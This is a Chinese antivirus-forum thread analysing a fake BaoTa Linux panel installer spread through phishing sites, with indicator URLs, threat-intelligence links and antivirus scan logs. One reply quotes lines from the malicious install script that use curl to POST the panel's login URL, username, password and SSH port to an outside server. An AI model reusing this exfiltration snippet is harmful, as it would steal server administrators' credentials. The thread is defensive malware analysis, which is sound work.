收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 假宝塔(Linux)
返回列表 发新帖
查看: 1263|回复: 9
收起左侧

[病毒样本] 假宝塔(Linux)

[复制链接]
hsks
发表于 2025-3-29 18:38:45 | 显示全部楼层 |阅读模式
本帖最后由 hsks 于 2025-3-29 18:43 编辑

前几周就注意到了,但当时以为是PUA(
Phishing:hxxps://skqq.jcjydzsw.cn/
hxxps://pcdla.lhkbgz.cn/


hxxps://bt.appokset.com

https://pan.huang1111.cn/s/DV59wH4

https://www.virustotal.com/gui/f ... 6b3b0fb7a913b54f287
https://www.virustotal.com/gui/f ... 26ad24475?nocache=1

另附上claude的分析,仅供参考



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +3 收起 理由
胡淇允 + 3 版区有你更精彩: )

查看全部评分

回复

举报

453125415
发表于 2025-3-29 18:49:08 来自手机 | 显示全部楼层
还以为是破解版宝塔,结果是假官网加料,能碰这东西的应该没有傻到这程度装这个
回复

举报

hsks
 楼主| 发表于 2025-3-29 18:52:01 | 显示全部楼层
453125415 发表于 2025-3-29 18:49
还以为是破解版宝塔,结果是假官网加料,能碰这东西的应该没有傻到这程度装这个

就怕小白站长被百度广告骗了(

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

呼啸山庄
发表于 2025-3-29 18:53:18 | 显示全部楼层
本帖最后由 呼啸山庄 于 2025-3-29 21:58 编辑

20250329 19:22
opentip clean https://opentip.kaspersky.com/B5 ... A913B54F287/results (submitted to reanalyze)
20250329 19:04
疑似载荷:
  1. https://bt.appokset.com/lcsys
复制代码

Kaspersky Plus 21.20.8.505 数据库发布日期:2025/3/29 15:47
Scan miss
ESET Internet Security 18.1.10.0
  1. Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
  2. 2025/3/29 19:01:45;HTTP filter;file;https://bt.appokset.com/lcsys;a variant of Linux/Flooder.Agent.IM trojan;connection terminated;;Event occurred during an attempt to access the web by the application: C:\Program Files\Mozilla Firefox\firefox.exe (0335E6B92D462213B41BA6F7F32D63B727F59964).;A9A3536803B5C636C4F661D7577E9E5A795B6903;2025/3/29 19:01:44
复制代码

20250329 18:48
Kaspersky Plus 21.20.8.505 数据库发布日期:2025/3/29 15:47
Scan miss
  1. 事件: 任务已启动
  2. 应用程序名称: avp.exe
  3. 应用程序路径: C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.20
  4. 设置: 安全级别: 自定义,机器学习和特征码分析: 是,启发式分析: 深度扫描,扫描技术: iSwift: 是, iChecker: 是,检测到威胁后的操作: 清除;如果清除失败则删除
  5. 用户:
  6. 用户类型: 活动用户
  7. 组件: 病毒扫描
  8. 结果: 任务已启动
复制代码
  1. 事件: 扫描已完成。现在没有活动威胁
  2. 用户:
  3. 用户类型: 发起者
  4. 组件: 病毒扫描
  5. 已扫描对象: 2
  6. 已检测对象: 0
  7. 对象已处理: 0
  8. 对象未清除: 0
  9. 对象已清除: 0
  10. 对象已删除: 0
  11. 移动到隔离区的对象数量: 0
复制代码
ESET Internet Security 18.1.10.0
Scan miss (submitted)
  1. Scan Log
  2. Version of detection engine: 30949P (20250329)
  3. Date: 2025/3/29  Time: 18:49:35
  4. Scanned disks, folders and files: D:\MalwaresSamples\bbs.kafan.cn\2280318\install_lts.sh
  5. User:
  6. Number of scanned objects: 2
  7. Number of detections: 0
  8. Time of completion: 18:49:35  Total scanning time: 0 sec (00:00:00)
复制代码
回复

举报

lsop1349987
发表于 2025-3-29 19:27:37 | 显示全部楼层
McAfee扫描miss
回复

举报

吃瓜群众第123位
发表于 2025-3-29 19:33:00 | 显示全部楼层
SEP miss

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

心醉咖啡
发表于 2025-3-29 22:11:10 | 显示全部楼层
火绒

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

DisaPDB
发表于 2025-3-29 22:30:22 | 显示全部楼层
本帖最后由 DisaPDB 于 2025-3-29 22:34 编辑

关联狩猎图谱:
https://x.threatbook.com/v5/domain/bt.appokset.com
https://x.threatbook.com/v5/domain/a89.mee333.com
https://x.threatbook.com/v5/domain/a87.mee333.com
https://s.threatbook.com/report/ ... b41d24a0c00d6774f66
https://s.threatbook.com/report/ ... 6b3b0fb7a913b54f287

https://ti.360.cn/graph?module=m ... c91715ad2d0180fae89
https://ti.360.cn/url/https%3A%2F%2Fwiccp.shcka.cn

至于那个启动脚本,
  1. data="external_url=${HTTP_S}://${getIpAddress}:${panelPort}${auth_path}&internal_url=${HTTP_S}://${LOCAL_IP}:${panelPort}${auth_path}&username=$username&password=$password&ssh_port=$ssh_port"
  2. curl -s -X POST -d "$data" https://downbt.cc/api.php
  3. rm -f $Updatings
复制代码
将面板的登录信息明文发送到downbt.cc
回复

举报

多变的风向
发表于 2025-3-29 23:00:47 | 显示全部楼层
下载链接被FSP拉黑
回复

举报

biue
发表于 2025-3-29 23:59:30 | 显示全部楼层
腾讯电脑管家 不报
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-9 10:03 , Processed in 0.133691 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表